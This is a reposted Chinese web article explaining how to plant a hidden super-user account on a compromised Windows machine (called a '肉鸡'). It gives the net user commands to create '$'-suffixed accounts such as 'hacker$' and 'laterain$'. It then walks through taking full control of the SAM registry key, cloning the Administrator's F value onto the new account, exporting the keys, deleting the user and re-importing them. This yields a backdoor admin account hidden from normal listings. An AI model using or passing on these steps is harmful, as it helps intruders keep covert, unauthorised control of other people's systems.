首页 > 网站 > 建站经验 > 正文

Windows系统如何建立隐藏的超级用户

2024-04-25 20:44:29
字体:
来源:转载
供稿:网友

对regedit.exe我想大家都很熟悉,但却不能对注册表的项键设置权限,而regedt32.exe最大的优点就是能够对注册表的项键设置权限。nt/2000/xp的帐户信息都在注册表的HKEY_LOCAL_MACHINE/SAM/SAM键下,但是除了系统用户SYSTEM外,其它用户都无权查看到里面的信息,因此我首先用regedt32.exe对SAM键为我设置为“完全控制”权限。这样就可以对SAM键内的信息进行读写了了。具体步聚如下:

  1、假设我们是以超级用户administrator登录到开有终端服务的肉鸡上的,首先在命令行下或帐户管理器中建立一个帐户:hacker$,这里我在命令行下建立这个帐户 net user hacker$ 1234 /add

  2、在开始/运行中输入:regedt32.exe并回车来运行regedt32.exe。

  3、点“权限”以后会弹出窗口点添加将我登录时的帐户添加到安全栏内,这里我是以administrator的身份登录的,所以我就将administrator加入,并设置权限为“完全控制"。这里需要说明一下:最好是添加你登录的帐户或帐户所在的组,切莫修改原有的帐户或组,否则将会带来一系列不必要的问题。等隐藏超级用户建好以,再来这里将你添加的帐户删除即可。

  4、再点“开始”→“运行”并输入"regedit.exe" 回车,启动注册表编辑器regedit.exe。 打开键:HKEY_LOCAL_MAICHINE/SAM/SAM/Domains/account/user/names/hacker$"



步骤:

创建一个以$结尾的用户(因为这样在命令行下不显示该用户)

列:net user laterain$ 123456 /add

       net localgroup administrators laterain$ /add

打开注册表(运行:regedit)

进入 HKEY_LOCAL_MACHINE/SAM/SAM

修改SAM的权限为  完全控制

刷新 F5

进入 HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users

复制 HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users/000001F4 的F的值(此处为管理员)

进入 HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users/Names/laterain$ 查看类型的值(0*3ef)

根据类型的值在 HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users 中找到 laterain$ 的对应名称(000003EF)

将 HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users/000003EF 的F值改为管理员的

然后导出 HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users/000001F4

                HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users/000003EF

                HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users/Names/laterain$

然后删除用户 laterain$

例:net user laterain$ /delete

然后导入刚才导出的文件

发表评论 共有条评论
用户名: 密码:
验证码: 匿名发表